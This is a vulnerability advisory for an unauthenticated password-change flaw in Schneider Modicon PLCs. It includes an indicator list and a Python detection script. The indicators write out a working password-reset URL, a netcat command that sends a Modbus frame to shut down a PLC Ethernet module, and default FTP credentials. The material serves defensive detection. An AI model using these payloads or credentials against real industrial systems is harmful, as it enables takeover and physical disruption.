CVE-2018-7811
published 2018-11-30


Priority: P267
CVSS 3.0: 9.8 (critical)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EPSS: 3.50% (87.7th percentile)
An Unverified Password Change vulnerability exists in the embedded web servers in all Modicon M340, Premium, Quantum PLCs and BMXNOR0200 which could allow an unauthenticated remote user to access the change password function of the web server

Detection & IOCs (extracted from sources)

url: http://[ip]/unsecure/embedded/builtin?Language=English&user=admin&passwd=evilpass&cnfpasswd=evilpass&subhttppwd=Save+User
path: /unsecure/embedded/builtin
path: /secure/embedded/builtin
port: 502
command: echo -ne "\x0\xa8\x0\x0\x0\x5\x0\x5a\x0\x7\x0" | nc 192.168.238.30 502
bytes: \x0\xa8\x0\x0\x0\x5\x0\x5a\x0\x7\x0
  • Detect HTTP GET requests to /unsecure/embedded/builtin that carry password-change parameters (passwd=, cnfpasswd=, subhttppwd=Save+User) without any prior authentication. This is the CVE-2018-7811 attack vector; because the request is a GET with the new password in the query string, it is visible in proxy and web-server access logs as well as on the wire.
  • Monitor for HTTP GET requests to /secure/embedded/builtin with password-change query parameters (passwd=, cnfpasswd=, subhttppwd=Save+User) — absence of anti-CSRF token and no current-password requirement makes CSRF exploitation (CVE-2018-7831) detectable by this pattern.
  • Alert on Modbus TCP traffic to port 502 on Modicon devices containing the byte sequence \x00\xa8\x00\x00\x00\x05\x00\x5a\x00\x07\x00, which triggers a complete shutdown of the Ethernet module.
  • Flag use of known default credentials on Modicon FTP services: sysdiag/factorycast@schneider, fdrusers/sresurdf, fwupgrade/FaAmU5p2F~, loki/ZfTljublsx.
  • The unauthenticated password-change endpoint (/unsecure/embedded/builtin) is distinct from the authenticated endpoint (/secure/embedded/builtin); detection rules must cover both paths to catch both the unauthenticated (CVE-2018-7811) and the CSRF-based (CVE-2018-7831) attack scenarios.
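The detection bullets above, turned into runnable checks. This is an added example and is not code from cvebase, NVD or Schneider Electric. It parses the request URL rather than string-matching it, so parameter order and URL encoding do not defeat the rule, and it matches the Modbus shutdown frame on everything after the two-byte transaction ID, which the client chooses freely and a naive byte-for-byte match would miss. The event tuples, the 192.0.2.10 address and the function names are constructed for the example.

```python
"""Detection logic for the CVE-2018-7811 / CVE-2018-7831 indicators and the
Modbus shutdown frame listed above. Added example; the event format and the
sample events are constructed, not real captures."""
import struct
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, urlsplit

# Endpoints from the advisory text: unauthenticated (CVE-2018-7811) and
# authenticated-but-CSRF-able (CVE-2018-7831) password-change handlers.
PASSWORD_CHANGE_PATHS = {
    "/unsecure/embedded/builtin": "CVE-2018-7811 (unauthenticated password change)",
    "/secure/embedded/builtin": "CVE-2018-7831 (CSRF password change)",
}
PASSWORD_CHANGE_PARAMS = {"passwd", "cnfpasswd", "subhttppwd"}

# Modbus TCP frame from the IOC list (MBAP header + PDU) that shuts down the
# Ethernet module: tid 0x00a8, proto 0, length 5, unit 0, function 0x5a.
SHUTDOWN_FRAME = bytes.fromhex("00a80000000500" "5a000700")

# Default FTP credentials listed on the page, as (user, password).
DEFAULT_FTP_CREDS = {
    ("sysdiag", "factorycast@schneider"),
    ("fdrusers", "sresurdf"),
    ("fwupgrade", "FaAmU5p2F~"),
    ("loki", "ZfTljublsx"),
}


def check_http_request(method: str, url: str) -> Optional[str]:
    """Return a finding if the request targets a password-change endpoint with
    password-change parameters; None otherwise. parse_qs decodes '+' and
    percent-escapes, so 'Save+User' and 'Save%20User' both match."""
    parts = urlsplit(url)
    rule = PASSWORD_CHANGE_PATHS.get(parts.path)
    if rule is None:
        return None
    present = PASSWORD_CHANGE_PARAMS & set(parse_qs(parts.query))
    if not present:
        return None
    return f"{rule}: {method} {parts.path} with {sorted(present)}"


def check_modbus(payload: bytes) -> Optional[str]:
    """Flag the Ethernet-module shutdown frame. The MBAP transaction ID
    (bytes 0-1) is an arbitrary client-chosen value, so the comparison skips
    it and matches protocol ID, length, unit ID and the PDU (assumption: the
    PLC does not key its behaviour on the transaction ID)."""
    if len(payload) < 8:
        return None
    tid, proto, length, unit = struct.unpack(">HHHB", payload[:7])
    func = payload[7]
    if proto == 0 and payload[2:] == SHUTDOWN_FRAME[2:]:
        return (f"Modbus Ethernet-module shutdown frame: func 0x{func:02x}, "
                f"unit {unit}, tid 0x{tid:04x}, length {length}")
    return None


def check_ftp_login(user: str, password: str) -> Optional[str]:
    """Flag a login that uses one of the known default Modicon FTP accounts."""
    if (user, password) in DEFAULT_FTP_CREDS:
        return f"default Modicon FTP credential used: user '{user}'"
    return None


# Constructed sample events (kind, fields...). Not real traffic.
SAMPLE_EVENTS: List[Tuple] = [
    ("http", "GET", "http://192.0.2.10/unsecure/embedded/builtin?Language=English"
                    "&user=admin&passwd=evilpass&cnfpasswd=evilpass&subhttppwd=Save+User"),
    ("http", "GET", "http://192.0.2.10/secure/embedded/builtin?user=admin"
                    "&passwd=x&cnfpasswd=x&subhttppwd=Save%20User"),
    ("http", "GET", "http://192.0.2.10/secure/embedded/builtin?Language=English"),  # benign
    ("modbus", bytes.fromhex("123400000005005a000700")),   # shutdown PDU, different tid
    ("modbus", bytes.fromhex("000100000006010300000001")), # ordinary read holding registers
    ("ftp", "sysdiag", "factorycast@schneider"),
    ("ftp", "operator", "hunter2"),
]


def run(events: List[Tuple]) -> List[str]:
    """Apply the matching check to each event and collect the findings."""
    findings = []
    for ev in events:
        if ev[0] == "http":
            finding = check_http_request(ev[1], ev[2])
        elif ev[0] == "modbus":
            finding = check_modbus(ev[1])
        else:
            finding = check_ftp_login(ev[1], ev[2])
        if finding:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for line in run(SAMPLE_EVENTS):
        print(line)
```

In production these checks would sit behind a web-proxy or IDS log parser for the HTTP rules and a Modbus-aware packet decoder for the 502/tcp rule; the benign page load of /secure/embedded/builtin is deliberately included so that the rule fires on the password-change parameters, not on the path alone.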

CVSS provenance

NVD v3.0: 9.8 CRITICAL, CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
NVD v2.0: 5.0 MEDIUM, AV:N/AC:L/Au:N/C:N/I:P/A:N